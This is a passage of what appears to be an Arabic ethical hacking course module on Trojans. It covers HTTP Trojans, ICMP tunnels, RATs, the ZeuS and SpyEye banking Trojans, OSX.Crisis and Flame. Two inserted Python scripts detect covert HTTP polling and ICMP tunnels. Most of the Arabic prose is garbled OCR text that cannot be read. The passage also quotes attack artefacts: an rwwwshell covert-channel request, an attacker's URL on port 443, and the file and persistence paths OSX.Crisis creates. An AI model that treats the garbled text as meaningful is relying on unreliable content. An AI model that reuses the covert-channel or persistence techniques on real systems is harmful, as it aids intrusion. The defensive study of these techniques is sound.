HTTP ^ (reverse way) <J lWjj *^-aJI ub^ 6- t?i jj 1 ^ HTTP/HTTPS Trojans 

a jAjj SjlkUl i aj.v.A<l Jc. ojlA ojl j^>la S'i, ^■■vi Ijijj ^jj _gQ j^aiallj ejjjjj^l <Lbi ( _ s Jc. 4_ajlall ejl^l jll - laamj .(HTTP tlWtiel) 

l$] iejj^j t^illj ^jUaJI "-i^**! js-^j li* child <-y^ .uj** ^ ?j j J£ child (spawn^J^ 
^jJI c-ujll fi-i-j c^'j ' (local shelVjfe^* Jj «JS j ^jL li* child g^ji ^* j .^j^V J_^jii 
^ ^jjAaII HTTP ^^j^^ .Sj*^ *^ j^j J^j j^j HTTP ^ J^V^ ^f^ 1 u^-W^^ 

(local shell) kL'^W ^ Uiiii child-^ j^' c> ^Sljll ^ o- 3 ^^ s^j^^ 

^ 'Cgi-string-S j BASE64 J 4^ ^ (traffic) jjj* J^j^ ^ .^^31 
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Slave: GET /cgi-bin/order?M5mAejTgZdgYOdgIOoBqFfVYTgjFLdgxEdblHe7krj HTTP/1.0

Master replies with: g5mAlfbknz

<> "Is" >abU j*> jaJI Hp^I c> (command prompt) jVl JaSa ja (slave) <^WI < L^J] GET 
^ cj^Vl P j! lilj .MASTER J\ ^ ^ ^ Jj^ SLAVE .(MASTER) ^J^\ ^\ J* 

*<y*\\ jjA* lil 4_IU> ^£ mLs ^\ f* <A.5L-a}j <ia (jSaall 4 £ *J ^ig-xJl jl£ 'Sliell^- 1 ^ J^J ^ ^\ ^Uij child 

(password) token ^j^-j <jj" i J jj ja ^-* lsj^ * t^-joiib <u JL^ajVU ^IS ^ ^l^JI J) JL^iVI 

^UjJI .^a* jjSj (full-featured web proxy cachej <squid < J^) WWW proxies .Sji^l GET CGI 
cJ^-uijj .L_aL J£3 J^k 260 6 SLAVE j MASTER ^IjJI J j**-* j^*-^ 3 ^j^' .^jUI-uJI ^ <UjuiI *UaL 
J^-^ j 'SLAVE "rwwwshell.pl slave" ^ JjjL j& tSllij 4 ^j^ » ^ t ^jSII rwwwsheLl.pl ^ ;l^J.ikU 

. JL^fU p yai SLAVE ^ JjU, g^l c^ll 1£ MASTER J* "rwwwshell.pl" 



[Figure: the Victim sends an HTTP request to download a file; the Server returns the Trojan payload through the HTTP reply]
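The rwwwshell exchange above hides its channel in ordinary-looking GET requests to /cgi-bin/ whose query string is a base64 blob, sent on a fixed polling interval. The following is an added example, not code from the original module, that looks for exactly that shape in web-server access log lines: the log lines, client addresses and timestamps are constructed, and the first query string is the one quoted in the text.

```python
import math
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Common Log Format line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Characters of standard and URL-safe base64 (padding is split off with the '=' separator).
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]+$")


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64 text scores well above 4, form-field values below."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    return rec


def encoded_payload(query: str, min_len: int = 32, min_entropy: float = 4.0) -> bool:
    """True if a query component is a long, base64-looking, high-entropy blob: an opaque
    message rather than a form field such as q=firewall+logs."""
    for piece in query.split("&"):
        for part in piece.split("="):
            if len(part) >= min_len and B64_RE.match(part) and shannon_entropy(part) >= min_entropy:
                return True
    return False


def analyse(lines: List[str], min_polls: int = 3, max_jitter: float = 0.2) -> Dict[str, Dict]:
    """Per client: count encoded /cgi-bin/ requests and test whether they arrive on a fixed schedule."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_client[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in per_client.items():
        cgi = [r for r in recs if r["path"].startswith("/cgi-bin/")]
        encoded = [r for r in cgi if encoded_payload(r["query"])]
        if not encoded:
            continue
        f = {"encoded_requests": len(encoded), "regular_polling": False, "mean_interval_s": None}
        times = sorted(r["ts"] for r in encoded)
        if len(times) >= min_polls:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mean = statistics.mean(gaps)
            f["mean_interval_s"] = mean
            # Low relative spread between polls means a timer, not a person clicking links.
            f["regular_polling"] = mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter
        findings[ip] = f
    return findings


# Constructed access-log excerpt: 10.0.0.8 polls /cgi-bin/order once a minute with an encoded
# query (the first one is the string quoted in the text); 192.168.1.20 is ordinary browsing.
SAMPLE_LOG = [
    '10.0.0.8 - - [11/Mar/2013:10:00:00 +0000] "GET /cgi-bin/order?M5mAejTgZdgYOdgIOoBqFfVYTgjFLdgxEdblHe7krj HTTP/1.0" 200 10',
    '192.168.1.20 - - [11/Mar/2013:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '10.0.0.8 - - [11/Mar/2013:10:01:00 +0000] "GET /cgi-bin/order?q8RzLp2WxKvN0tYsBhJ3eCdGuA6mF9iZo1TlXnUwSk HTTP/1.0" 200 10',
    '192.168.1.20 - - [11/Mar/2013:10:01:30 +0000] "GET /cgi-bin/search?q=firewall+logs HTTP/1.1" 200 2048',
    '10.0.0.8 - - [11/Mar/2013:10:02:00 +0000] "GET /cgi-bin/order?Kd7PwXe2nRaY5hL0tUqVb9sMcGjF3iZoNxT8wEr1yAl HTTP/1.0" 200 10',
    '10.0.0.8 - - [11/Mar/2013:10:03:00 +0000] "GET /cgi-bin/order?Zt4GhN8kQwB1cVy6LmR0oXpD9sEaJ5fUi2TnHbK7vC HTTP/1.0" 200 10',
]

if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG).items():
        print(ip, finding)
```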



HTTP Trojan: HTTP RAT 

jj2 jj RAT J clA^ CP" f ^ l) <JLoilal3 ^uujJj 4ijjJa>Jl jj jJla^ll Cf"^ (jg& RATS 

RAT <yjj^ l^l-i^l o^j 6L_a^JI ^Lkjl! jlkl ^ j^aj .<-i^l jjjju^l J^. % j UuM backdoor 

^Ia^. S^aLuLg ^\ * all ^j£^<uJl (Ja^J <^^J L^J^V^ *^ £y* * ^ RAT .botliet ^^jjj A^lstjJall jfi j±±j&1\ 



[Figure: HTTP RAT: the attacker generates server.exe using HTTP RAT and infects the victim's computer with it, planting the HTTP Trojan; the Trojan sends an email with the IP address; the attacker connects to that IP address using a browser on port 80]

- Displays ads, records personal data/keystrokes
- Downloads unsolicited files, disables programs/system
- Floods the Internet connection and distributes threats
- Tracks browsing activities and hijacks the Internet browser
- Makes fraudulent claims about spyware detection and removal
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Shttpd Trojan - HTTPS (SSL) 

.Wb 3 ^ u' C++ source code ^ <J^ 4 \i *> ^ cs^'j HTTP j*> Shttpd 

s^j J) j^j^f*^ cJjj^ «j gr^J chess.exe 4 \j* > ^ u^ 1 ^ Shttpd u' i> 



.chess.exe J*j&&\ jW 'M-^j 

.(SSL) 443 ^ c> fcl^Vlj ^ lU^ J ^ Shttpd 

■ http://10.0.0.5:443 f 1 ^ 1 ^ t> J-^VI ^ 




[Figure: Shttpd: Attacker (IP: 10.0.0.5:443) and Victim (IP: 10.0.0.8:443); a normal firewall allows you through port 443; the attacker connects to the victim using a web browser (http://10.0.0.5:443); the victim's computer is infected with chess.exe, and Shttpd should be running in the background listening on port 443 (SSL)]



ICMP Tunneling



f >J3 cAAaA\ * y± arbitrary information & if- lU*^ .-W^ ICMP tunnel(ICMPTX) ? 
A (Covert channel) ^ c> ICMP_ECHO traffic ICMP_ECHOREPLYj ICMP_ECHO 

oUSl! £>i& ^Ia^IujI ci*^ 6 ICMP ECHO traffic ^iAjj^-q ^ $ .tunnel c : ^ 

masquerading uj^ jj-^ ^ .W^^j j' ^ s^Um l tl^J^ ^ jj^JL (j^jij <LLouj j^a^I^aII 

.ijjlkJI c^UjixJI <> ^ (tunnel) l+S-s P >II ^ ICMP_ECHO traffic 

^usu > Lj&M <Lta jjc. Jj^jjjjj ^ CjULJI plikj ^ ^.l^Jl ^1 Aijjiall ^ (Covert channel) ^ j^3t 
^ J-^W (Covert channel) 4j>Jt sliill ^ . j*J JjSjjjjj ^ JjSjjjjj Ja^j ^1 j funnel 

<jc 6jUc lg lx^j 11a , (Covert channel^So^ U' ^ <s ^ *j ^^^^ ^ ^j^ r< .^j>»iljqll ^Uaill ^1 l_u3LojI 

.L-fl, ^ im^ t Jl^Jl backdoor ^j^^ ^LSII ^ ^L^ jl u^ 1 ^ attractive mode 




[Figure: ICMP Trojan icmpsend/icmpsrv: the ICMP Client runs "icmpsend <victim IP>", the ICMP Server runs "icmpsrv -install"; commands are sent using the ICMP protocol (two Command Prompt windows)]
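ICMP tunnels such as ICMPTX and the icmpsend/icmpsrv pair above put arbitrary data where ping puts a fixed pattern, and the server answers with data of its own instead of echoing the request back. The following is an added example, not code from the original module: it assembles a few ICMP echo messages (the "tunnel" bytes are a fixed hash standing in for tunnelled data, not captured traffic) and applies those two checks plus a checksum and an entropy test.

```python
import hashlib
import math
import struct
from collections import Counter
from typing import Dict, List

ICMP_ECHO_REPLY, ICMP_ECHO = 0, 8
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte default of Windows ping


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words (an odd trailing byte is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble an echo / echo-reply message; used here only to construct sample traffic."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(msg: bytes) -> Dict:
    if len(msg) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    t, code, _, ident, seq = struct.unpack("!BBHHH", msg[:8])
    # Summing the whole message, checksum field included, yields 0 when the checksum is right.
    return {"type": t, "code": code, "id": ident, "seq": seq,
            "payload": msg[8:], "checksum_ok": icmp_checksum(msg) == 0}


def is_standard_ping_payload(p: bytes) -> bool:
    """Windows: fixed alphabet; Linux iputils: 8-byte timestamp then the bytes 0x10, 0x11, ..."""
    if p == WINDOWS_PING_PAYLOAD:
        return True
    n = len(p) - 8
    return n > 0 and p[8:] == bytes((0x10 + i) & 0xFF for i in range(n))


def byte_entropy(b: bytes) -> float:
    if not b:
        return 0.0
    n = len(b)
    return -sum(c / n * math.log2(c / n) for c in Counter(b).values())


def analyse(messages: List[bytes], max_entropy: float = 4.5) -> List[Dict]:
    """Report echo traffic that behaves like a data channel rather than a reachability probe."""
    requests = {}                      # (id, seq) -> request payload, to compare with the reply
    findings = []
    for msg in messages:
        m = parse_icmp(msg)
        if m["type"] not in (ICMP_ECHO, ICMP_ECHO_REPLY):
            continue
        reasons = []
        if not m["checksum_ok"]:
            reasons.append("bad checksum")
        if not is_standard_ping_payload(m["payload"]):
            reasons.append("payload is not a known ping pattern")
        if byte_entropy(m["payload"]) > max_entropy:
            reasons.append("high-entropy payload (encrypted or compressed data?)")
        key = (m["id"], m["seq"])
        if m["type"] == ICMP_ECHO:
            requests[key] = m["payload"]
        elif key in requests and requests[key] != m["payload"]:
            reasons.append("reply payload differs from request (RFC 792: a reply echoes the data)")
        if reasons:
            findings.append({"type": m["type"], "id": m["id"], "seq": m["seq"], "reasons": reasons})
    return findings


# Constructed sample: one ordinary Windows ping round trip, then a request/reply pair in which
# both directions carry their own data. The "tunnel" bytes are a fixed hash, not real traffic.
TUNNEL_DATA = (hashlib.sha256(b"constructed-tunnel-payload-1").digest()
               + hashlib.sha256(b"constructed-tunnel-payload-2").digest())
SAMPLE = [
    build_echo(ICMP_ECHO, 1, 1, WINDOWS_PING_PAYLOAD),
    build_echo(ICMP_ECHO_REPLY, 1, 1, WINDOWS_PING_PAYLOAD),
    build_echo(ICMP_ECHO, 0x4242, 7, TUNNEL_DATA[:32]),
    build_echo(ICMP_ECHO_REPLY, 0x4242, 7, TUNNEL_DATA[32:]),
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print(finding)
```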



Remote Access Trojans 



tAxj CjULJI Jj^ajll ffii^ j o^^JI L-fl ^" .. i^ t ^Uiill Jic a1*\£1\ s jkiJI jajj Remote access Trojans 
iaidll £-*1uijj t^U£ Remote access Trojans cs* ^ j ^-^^ j <<^aUJi d^t^xJI j 

tiijj^a ^1 Bugbear virus < j^f .NetBus Trojans j Back Orifice Trojans :lU^ ^ ^ 

.jUjjjII ^ yr-u^c JU^jI *1£>V kikkjl l server.exe ^ (Rebecca f s)j^j^^^ jW -M^-a] -1 
.(Rebecca's) ^ > ^ t lU£ <^ <jJ (Jason) -3 




Remote Access Trojan: Rat DarkComet and Apocalypse 

ji ^ikjjaixJ! ^Ic ^jj^ l-jL^xaH jlg^JI (j-* AjjbVl CjI jUl<»VI j Jajl j^all (jc J jj^a jll till ^jjj c _^Jill sbVl ^ DarkComet 
clA^ c5-^"j ^^J. j j^jj^^^j s-^j^^ ^^j^^ '(cind)^^^ ^registry tCjULajLii J jj^a jll till jSjj 

jULJI Jjii^ul (.dll) ^jULII ^-UuJIj cU^U registry ^ sbVl ^ Apocalypse Remote Access Trojan 



[Screenshot: DarkComet RAT control panel listing connected hosts]
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Covert Channel Trojan: CCTT 



tj* ±2xl\ <iS3 jSjj <jU . ^aa A \ cjljjall fUuV obi ^ (Covert Channel Tunneling Tools) JL^iVI cjl^ja iiiljJ 
f Lkj l«j ^1 c^ 1 (HTTP 'UDP 'TCP) (data stream)^^ 6" ^ hAjLjjH Jaj jS! C UJI j ji^sl U^l jjUl 

Jail CjljjS Jlij t^jjja all jl jikVI ^jUsj t*S] o^-JJJ (CCTT) cS^-ll JL^sjVI iji jj3 CjIjJ .^ill Jl J jlU f^jll 

^ylc J j . ^i-sl l t> (j^aalfrJI (jixu Lil ^l J^j^ijUj ^^jII ? Lkj l^j jii gjll (data stream) ^-ibJI <j}" g-i dULJl 
j ^ TCP/UDP/HTTP CONNECTIPOST^I jtfll J*^ aAA .^l j UiJil *£*51l Jib <> ^ jU. ftel(shett) 

.U±\A\ boxj c^j>i (.ell 'POP 'SMTP 'SSH) TCP data streams 








[Figure: CCTT: covert channel through the Firewall and a Proxy Chain to the Target Services]



E-Banking 



i ^jj c— < dijjjjy( Ajajj^axJI dj^^LdU-JI CjU^jiiil Lloujj I^^j lS^^ cii^jj^al j 1^ SjjJak E-banking Trojans 

Jl l-i^j V tillil .<ajjoil3 ^ - aaVI ^Jlj ^^Vl .^Jl \l±uu* ^jj ^jL^jjiill -c ^ijj^a>JI ^ 1 a^-ll J 

^ilsuj JLii^Vl ^ jill (j-G ^^ic I jjoJ Ul^uJall St&Jt L_jLud^. c Luj£ ^ screenshot <*-jUa£3 ikU ^jL^. ^jIj .c&JI 

. E-banking Trojans^ ^I^i^Ij ^ (J^\ 



[Figure: E-banking Trojan flow: malicious advertisements published among legitimate websites redirect the user to a malware server hosting an exploit kit; the user's PC is exploited; when the user accesses the bank account, the Trojan reports user activities to the control and command server, which sends instructions to manipulate the bank's transactions and receives reports about successful/failed transactions]
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exploit kit ul* Aj""^ exploit kit i> ^ <^ H^J^ j*j 

<jJa^lc> (malware) SjLjall £c-gI Jill .6,j|jj]a ^jl - C-UJJj] 11a ^.J^klLoaJj 4_i^jJa3l ^aUaj ^^Ic 4_Lia^j La ^^Ic SjlaJjgJ J ^1x^.1^13 

(jLa. jJjJl Clli^ ^ botliet U*^ 1 U ^ ^Uaj .CllLuijjjil] S^bja all (j-a l!^ VI Lgic i ftjjj^H Vj 

O^LUlj ^a^lA. IgJLuljl ^JJ £tJjtjj t^jUuiall ^3jJ '(jjj-^ ^^JjoixJI f"^) <-! J^^l J.?? i ^ ^Uucl 

^jli tdljjljyi JJC- dL>Lil*^J! s-l j^.V tiliill £-3 j-a ^ dl^yLalsLxJl ^joiS J jj^ jib 4_i^jJa3l ^ala lij .(jL^jjlill 

Banking Trojan Analysis 

^iaill ^jj^Aaajou (jjill ^.^IaslSI j ^jj <>>iaj ui a\\ <J Au >*MI CjLd jlx-al! ^^ic J jj^^JU ^aujj i— ^c^U^)j j& Banker Trojan 

tdij jjjVI CjX^U-aII <ajU^ll ^^ki^i Transaction Authentication Number (TAN) :Tan Grabber 

.XAN i^C 0 <^^\ L_fl^Jl d3ji3y! CjUj^J! a^I ^jj^aII 6^lj^)Ia JJ^ a I iklLujl ^^ic Axusu 

.lJ^JI J Ji^lii TAN 

J jSaJ! ^^kiaaj j dujjjyi jjc ajaj^^I CjUi^kll I J jl*. jjia ^ jilt I^a ;HTML Injection 

ID <jI*13 3JUi £>i& .cijLaij^al<JI c qVi^ ^ ^£ <^.li<JI ciijjjjyi CjULiJI 3_^^l<i <1loj j I a& ;Form Grabber 

E-Banking Trojan: ZeuS and SpyEye 

ZeuS ^ 

Source: http://www.secureworks.com
cil3i£ j Grabber ^ & c> aS\ U£ ciujjjyi a-^j-^JI dsXiU-Jl ^j^j dj^i ZeuS 

ZeuS 4_kjau3l . jjAijjll iaia L_fl^jjaijZeus botnet .cJ^^'VI CjUaia^j Jj-^jII J!>Lk ^^joujj cJ^^ 

;CjUi jlx-<JI AijjaJ CjIj^II <Lil^ <iLajjj J-<u1j j tdia jll ^jj^ .Windows Vista lS^^I ^Uaj ^^ic ^^i^. 

.HTTP is* c^IjLjjII - 
.Windows Protected Storage ^ ^Uu^VI CjUUj c_jLu^ ^j^j - 

.https j^J^l ^UiL ^-aUJI (PKI) ^1*11 sjI^jua c> 6 ^ c^^j X509 tij^ 

.pop ^ju^j ftp ci>^ - 

.Flash cookies j HTTP cookies ^Wc3j^ - 
.cjU Aijjoj j^ljc-V Ai.^ nn^l jil jxll ^ HTML cjUq>^i Jj^*j 

.Ai^i^l ^i) t> HTML J scraps j i^L - 

.(%systemroot%\system32\drivers\etc\hosts) (local file)J^& u j*j > ^ 1 Jaxj 
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.arbitrary programs ^Lj lU^ - 

. jjibj ^£ jjIS jjc^ jj jjfft^ll J*^j ^ *3 ajujUJI registry keys 

SpyEye *k 

,4i^jjaa>JI dijjijVI cjULoi^JI <JLJI 4ijjuJ g all ^j-<» I^I^jjujI ^jj ^^jII cijLi^ SpyEye 

.^1 ^ cj5U**1I 



[Screenshot: SpyEye builder (loading config, plugins, "build succeeded") and the SpyEye control panel]











Destructive Trojans: M4sT3r Trojan 

<Jjfi Ujiiti dal c\\a\\ ^jj 1 ^all jj;^^ jW-^ cl>^ ^—j^i^l L_fli^. jl jj q £3 L ^ s\ ^jL^jjj ^a ]M4sT3r Trojan 

£^J^ J ^— ^ J ^ \j» * 4 A j A S-l^V logiC bomb £c-GJJ-a jl \ fr-llc j IaJ > uJ (jl (j£-oJ ^^31 J 6 6^1 JJ^a (jl > ^>^> 

Ail^l format a^l jjiall .(Jj/r-uull ^»Uaj A j£ V 4_i^jJa3! _ JjlxjaLill ^aUaj jJ^o ^JJ ^ajL (jL^jjIill I^A ^jli t<L« nil ^aJJ LdAiC. 





Notification Trojans 



Notification t ^aujal l ^Uij lU^ ^ j .^W^^ ^ j^ > ^ t j^^^ jU^ IP lUjj Notification Trojans 

I^VIS ^^13 U^Ixj ^1 £jI jUa^VI (> ^^xj .^l^all Trojans 
.^l^ll Sj^Uxi jl^kj ;SIN Notification 
.ICQ ^ ^I^L-U ^1^1 >au ;ICQ Notification - 
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.^VJl e iA PHP ^ J\ l^j c> ^UUJl cUjj ;PHP Notification 
■cP jj^VI AD**' c^j^ 3 J-^} :Email Notification 
.net send j*Vl <> jtkkVI JUj] :Net Send 
.^Vll PHP ^ Jl L^j J^U c^LJ! cUjj ;CGI Notification 

.IRC ^ ^l^ki^U ^1*^1 jla^j :IRC notification 

Credit Card Trojans 



1 j c^UjjVI djlilkj ^ISjl Jlft J^alij t allk^ ( j r A^j ^ jij l^Jli ^A-puJall ^Uaj 1$ ^jj j) ^j^aj 6 Credit card Trojans 

(jl ^flllsu ^jUujVI <aUaJ ~ laJLu^o (Jaaj l^-jl Cilia dljjljVl JJC- 4_i3jj^>Jl CjUj^JI (Jja i j-aj ^Lodl ^jj 4 jjj! jill (Jj > <a1 9J 

AjjUaJ ^al,Jjkjjuil j dlLi jlx-<Jl £-<^J (j^Gjli (jj^ig^Jl ^jli t^JjilaxJl dlLi jlx-<Jl ^^Jc ^.JjkjjauJl <J j^.,J .Jj^aj ^j'qj'q^ ciliJl CjLg jlx-a 

4\"% > ^1 (jj,J > /Ml ^I^Vlm^U ^jUujVI 

jl >^ . jiil jill Ji^lii j <CVV2s ^AiUaJI JSa UUuJall AiUa±j ULiiall 4_uUjjVI cjUUJ! jjjau Credit card Trojans 

^ jij S,j|jjla ^,j| j^/i"lt aflLa /j 1 uJI CjLg jlx-<J! jL^^lj jll 4-lJjjj£3yi 4-i3jj^>Jl ojL j ^LqA^LuiaSI £^,Jjkj S,jI jjJa 

-C 5 ja.Vl jll c> ji 'IRC 'FTP ^jj^V 1 ^I^IuiIj axj jo ii^l jiU ^ajjjaiJ! CjUUJ! Jft 



[Figure: Attacker and Victim. Credit card Trojans steal victims' credit card related data such as card number, CVV2, and billing details; Credit card Trojans trick users into visiting fake e-banking websites and entering personal information; Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods]



Data Hiding Trojans (Encrypted Trojans) 

jii ; JLaxlu^U <LaJL^a jjc. CjULiJI Jjc^jj > jj jjj^ cs-^* ^—^-^ jj^* 1 v ^ j^j Encryption Trojans 

cjUIaju ^Usll UL^jJall Ijji^j jl Aj^ij ^jjJUaj ^jj^^l £ a\\ "bMtt a jjj>» \ A ^ Document ^1 ^ L - J ^^^^ j^j 

jjq> : »rij ^ajL ^ill ^xiljjJI ^jc diiaall J V" cijliLJI ^iil jxJI JjILg djjjjjVI (j-aLkll drugstore ^-^j^^ 
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[Figure: the Encryption Trojan encrypts data files in the victim's system and renders the information unusable; attackers demand a ransom or force victims to make purchases from their online drug stores in return for the password to unlock the files. Ransom message shown: "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password." "Do not try to search for a program that encrypted your information - it simply does not exists in your hard disk anymore," pay us the money to unlock the password]


OS X Trojan: Crisis 

j^ji^SW ^jc backdoor ^kj ^Lkj a^L^ jjSj j j£\ cjUjIxJI Jj^j ^\ s^ljjL jL-a^ OSX.Crisis 

When the Trojan is executed, it creates the following directories and files:

/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/MacOS/com.apple.mdworker_server
/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/Resources/
$HOME/Library/LaunchAgents/com.apple.mdworker.plist
$HOME/Library/Preferences/jlc3V7we.app
$HOME/Library/ScriptingAdditions/appleHID/Contents/Info.plist
$HOME/Library/ScriptingAdditions/appleHID/Contents/MacOS/UnsA3Ci.Bz7
$HOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r



: OSX.CrisisJ^ <> Ui*i2 ^511 *l* ^ u£ 
.Skype audio jjj* 
_diUaSJ JaUull j ^il > >iJ (jj^ j^jjli jl Safari 
. Adium j MS Messenger^ cjtibU^JI 
.command and control server CjULJI JLajl 



MAC OS X Trojan: DNSChanger 
Ia jjc. jl codecs cJ^^ J) ^j^^-^t j^- cjtiijVI (j^u J / lajuiill a£^1] DNS ^l^c-J lS^-^? ^ ^W^j^ 

4_icL<U^.Vl <juj^JI f <1 jVo'i o^lj^la a iklLaLj .(illi Jl Laj 6 JJ jjU^Jl <jujIjuj Jc ^gJaJ ^»J^ ^ (JiJ jll ads ^Aj^lc-VI 6£ JaJ dujJjVI 

.SjLjalt CjUuIxjII Jj aJj jj ^1 jJl J j^^lj ^jjxijij ^j^^klouJl 
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[Figure: DNSChanger: users are prompted to download a new codec to watch videos; the user then downloads the codec, which actually installs the Trojan]



.^l^ll ip jljk, J] ji^Ji DNS ^blJ^j ji^ ^ :DNS settings - 
jjjj V (^5^- -^o^ lS^*^ ^ 4L_flj^<J! <iL j^ll ^c^U^j cIujjj Asu iPlaying a video 

.HTTP post message f bii-A* Will jl^J! ^l^ll J) jU=^l jl- J ^ :HTTP message - 

_As^ MAC OS X ^ ^LA^l SjlaiJi ^ ji ^^ilaj <i^ilja3l : Complete control - 



MAC OS X Trojan: Hell Raiser 














[Screenshot: Hell Raiser control interface]

Note: The complete coverage of MAC OS X hacking is presented in a separate module.
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Trojan Analysis: Flame 

Source: http://www.kaspersky.com

cs^j (modular computer malware) ^W*J^ l^j 'Skywiper J sKyWlper <Flamer ,Flame 

tCjj^JI clA^j .USB (i^j^ j' (LAN) jjc ^ j^Vl J) j^il jl .(cyber espionage) 

aJu^jo1\ jj jji^H <J u' lA^j ( ; 1 J £ ' " ^jIj^Ia^ l^ajl J? ' "j . jj^>^ ^f^j t^jjlLftll iaLaijj ^screenshofr ^ 
jjj^j cPW^ ^-^o^ .^u*^ Bluetooth ^c^j ^^ill (j-a <JL^jV1 diL* jl*.* lSj^* <J j^-^ t ~ J cjIjLLg J] 

_Aja^all <atkj J^. Flame J ty^t L -*£ 



[Figure: Flame: a malicious user downloads the malware onto a victim in the LAN; the infected machine sends data to the attacker's command and control center and receives instructions back; infected hardware in the LAN spreads it further (Network Server, Victim)]
S^UUl ^>^y* U^*^ *^J^ UJ^T^ (S ^ O^*"^ L * ' ^ ' ^ ^ j1*-a3I (J jj^a^Jlj 4_l^jJa3l ^aUaj S^lj Ja (jLk^a^. (J^l 

yH jj^V^ f j% s jia^JI .iiuaJI j& f ^ j (command and control center) * j^JI j 

4_L^1a3I (_^^>^.V1 t j j > .^ij L-jU^aH jl^-aJl li^ ,^Uai3l AjU^Ij A-i^jJall ^aUaj C5 ic SjLJa (J-Ia^J <J> ^i^j tcillil 4 a>_nj j 

/ojlnjMill j o^Uill ^^W^^ lS^j^ <jU^-<JI aJ^xJI CjI^jjoJI o^-^-f C5^^ 

:^UJI jaJil ^ Flame CP cfe^l S- 51 ^ Kaspersky 
U3U jj c_fll£&! -aj jl axj Offline jj^t c^u^al ^1 tcjl jiJ Jaxj ^1 ^Flame C&C J ^all 

, l^kj-o ftjLJa ^ J t M > f >n^V (^joj^JjujI^ Jj3 ^j-q 

^1 j t<i^a3! dili ^ j^l j C&C ^ cJ^^ i> Flame V'^"^ ^1 5i cAIia j£\ c> 80 c> 

.2012j 2008 ^ u£ ^ 

tilli ^ Iaj 4d^c j>» Qli (Jsl±u Flame C&C AjSalill t *°J 1 ^ » ^1 j^Jt t^JjJaUJl ^jVl CIjI jiuJl 

.j jUm^ l jjia k&jA^ ^laa jll djUj^SI j <^jIS ^ Flame C&C domains ^ 

^O^J ^JJJ^J -^^jVI (j^)jua3l tilli LaJ O^Astlxi Lq ^ijL^axJl ^Ixi^JjaixJl (Jj^jujJ ^aJ d ^ aII ^g£juj^)ijuA£ (JaslxJ laSj 

jjjIj ll ; u^ll djUi jjujjj PDF ^-i^IaI c^^- ^^i^i p^J Flame cr^W* 



jUxjjIj^ ^a 



•W Flame C&C ^ ^ ^W^ 1 ^ 
. j^-aJI ^ j^modified PPDM compression j Zlib 

.Flame ^ 
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Flame C&C Server Analysis 4- 

Source: http://www.kaspersky.com

Jd-i jA\ <.o£h ' PHPf^^ j OpenVZ ^-64 *l jdl ^ x.6.0 uUp ^ Flame's C&C Server 
^] . (self-signed certificates)^ ^-2 J^V! ^jjU ^ MySQL ^-h 

^ ^lill s^j AiU^V ^viun .( PHP' MySQL'^U <o£LI) LAMP^I ^l/^UJI 

A_iiL^j\ JJ£3L U3I \ $ \^ un jjLJI(dujj£jajVl) Ajj^aill ^1 jJI c>axj Jj *j& 1 til3i£ j 6 (web-based control panel)^ j^V 

<J (document root directory) csjM ci^ <8080j 443 iiU-JI HTTPS JAwjj Jj—jll 
ljjjJI ^ l^Aflj Ujjjj ^3H cjUIaJI j^aj ^ilt ^HaJI document root directory) /var/www/htdocs/ 

.PHP ^ j <^V>* c5 yr^ J '(u^y JAuult ^UlajL A i^WW l-ujJI ^\ jL ^^-uub^l £l du^ 

l^jl l^jjxaII "str_split" <jl "str_split" function lSj^ var/www/htdocs/newsforyou/Utils.php 

PHP4 f cS^ljij f Ij-jii-y ^jVl ^ c&C JtjSl <^jji^ .PHP4 Je. ^li. ^ V ^Ij PHP5 ^ 

.C&Cs f3 J PHP -11 V^Vl cj| yi l> (f&A 



[Screenshot: contents of the /var/www/htdocs/newsforyou/ directory, and the control panel interface]

The C&C supported several client protocols, identified in the code as OldProtocol, OldProtocolE, SignupProtocol and RedProtocol, and four client types named SP, SPE, FL and IP. Only the client that identified itself as FL corresponds to Flame itself; the other three appear to belong to related, unpublished malware. Requests from a client are decoded by the C&C script, the uploaded files are stored on disk, and metadata about each upload is written to MySQL.

